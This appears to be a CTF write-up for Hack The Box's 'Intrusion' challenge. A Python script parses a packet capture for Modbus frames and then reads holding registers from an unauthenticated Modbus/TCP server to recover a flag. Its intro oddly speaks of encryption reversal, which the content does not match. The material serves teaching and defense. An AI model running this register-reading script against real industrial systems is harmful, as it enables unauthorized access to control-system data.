HackTheBox Intrusion Writeup
Explore the basics of cybersecurity in the Intrusion Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
The capture file network_logs.pcapng is parsed with the following script:
#!/usr/bin/python3
import socket
import sys
from time import sleep
from umodbus import conf
from umodbus.client import tcp
from scapy.all import rdpcap, TCP
# umodbus setting: decode register values as signed integers.
conf.SIGNED_VALUES = True

# Exactly one argument is expected: the Modbus/TCP endpoint as <ip:port>.
# NOTE(review): the port is converted to int but not range-checked here; an
# out-of-range value only fails later, when main() tries to connect.
if len(sys.argv) == 2:
    try:
        ip, _port_text = sys.argv[1].split(":")
        port = int(_port_text)
    except ValueError:
        # Raised when there is not exactly one ':' or the port is not numeric.
        print("Error: Invalid format for IP and port. Use <ip:port> format.")
        sys.exit(1)
else:
    print(f"Usage: {sys.argv[0]} <ip:port>")
    sys.exit(1)

# Capture file read by extract_modbus_commands_and_registers().
PCAP_FILE = "network_logs.pcapng"
def extract_modbus_commands_and_registers(pcap_file):
    """Collect candidate Modbus frames and register addresses from a capture.

    Every TCP payload whose hex text contains "34" is kept as a candidate
    frame. For candidates at least as long as the 12-byte sample frame, the
    last five bytes are inspected: if they begin with 0x10, one byte of that
    tail is recorded as a register address.

    NOTE(review): the listing this function was taken from had lost its
    indentation; nesting the length check under the "34" filter is a
    reconstruction - confirm against the author's original.

    Args:
        pcap_file: Path of the capture file handed to scapy's rdpcap().

    Returns:
        A tuple (modbus_commands, register_addresses): the hex strings of the
        candidate payloads and the list of extracted register addresses, both
        in capture order.
    """
    # Hex length of the sample frame (12 bytes -> 24 hex characters).
    min_hex_len = len("91ed00000006341000060001")

    modbus_commands = []
    register_addresses = []
    for pkt in rdpcap(pcap_file):
        if TCP not in pkt:
            continue
        payload = bytes(pkt[TCP].payload).hex()

        # 0x34 is 52, the unit id main() queries. This is a substring test on
        # hex text, so it is neither byte-aligned nor tied to the unit-id
        # field; unrelated payloads can match.
        if "34" not in payload:
            continue
        modbus_commands.append(payload)

        if len(payload) < min_hex_len:
            continue

        # Last five bytes, presumably function code + 2-byte address + 2-byte
        # quantity (the layout of the sample frame) - verify against the capture.
        tail = payload[-10:]
        if tail.startswith("10"):
            # Only the low byte of the 16-bit address field is read, so an
            # address above 0xFF would be truncated.
            register_addresses.append(int(tail[-6:-4], 16))
    return modbus_commands, register_addresses
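def main():
    """Parse the capture, then read each recovered register from the server.

    Prints the candidate frames and register addresses found in PCAP_FILE,
    connects to the module-level ip/port, sends one single-register
    read_holding_registers request per address to unit id 52, and joins the
    returned values as characters into the flag string, which is printed at
    the end.

    No credentials are exchanged anywhere in this function: the reads succeed
    for any client that can open a TCP connection to the server. On the wire
    the run is a series of single-register reads to unit 52 roughly 0.1 s
    apart, which is the pattern a monitor on the control network would see.

    Exits with status 1 if the connection cannot be established.
    """
    print("[*] Parsing Modbus commands and register addresses from the PCAP file...")
    modbus_commands, register_addresses = extract_modbus_commands_and_registers(PCAP_FILE)

    print("[*] Extracted Modbus Commands:")
    for cmd in modbus_commands:
        print(cmd)
    print("\n[*] Register Addresses:")
    print(register_addresses)

    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))
        print(f"Connected to Modbus server at {ip}:{port}")
    except Exception as e:
        # Release the descriptor before exiting; the original left the socket
        # open when connect() failed.
        if sock is not None:
            sock.close()
        print(f"Failed to connect to {ip}:{port} - {e}")
        sys.exit(1)

    flag = ""
    try:
        for address in register_addresses:
            command = tcp.read_holding_registers(52, address, 1)
            response = tcp.send_message(command, sock)
            if isinstance(response, list) and response:
                value = response[0]
                if value < 0:
                    # conf.SIGNED_VALUES is enabled at module level, so a
                    # register can decode as negative. chr() would raise
                    # ValueError and the handler below would drop every
                    # remaining register; skip just this one instead.
                    print(f"Register {address}: {value} is not a character code, skipped")
                else:
                    flag += chr(value)
                    print(f"Register {address}: {value} -> {chr(value)}")
            else:
                print(f"Failed to read register {address}: {response}")
            # Pause between requests.
            sleep(0.1)
    except Exception as e:
        # Best-effort: report the failure and still print what was collected.
        print(f"Error during Modbus communication: {e}")
    finally:
        sock.close()
        print("Connection closed.")

    print(f"Retrieved flag: {flag}")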
# Run main() only when this file is executed as a script.
# NOTE: the <ip:port> argument check above still runs on import.
if __name__ == "__main__":
    main()
Summary
The Intrusion Challenge at Hack The Box introduces participants to the fundamentals of hardware and network protocol security through the analysis of Modbus network traffic. This easy-level challenge emphasizes parsing, interaction with a Modbus server, and retrieving sensitive information stored in registers. By focusing on real-world applications of the Modbus protocol, the challenge delivers a practical learning experience, blending hardware-level insights with Python scripting to interact with industrial systems. It’s an excellent entry point for beginners to explore hardware security and network traffic analysis in a hands-on and engaging way. The takeaway for defenders is that the script reads the registers without presenting any credentials: Modbus/TCP has no built-in authentication, so register contents are only as private as the network path to the server, and access has to be restricted by segmentation and monitored at the network level.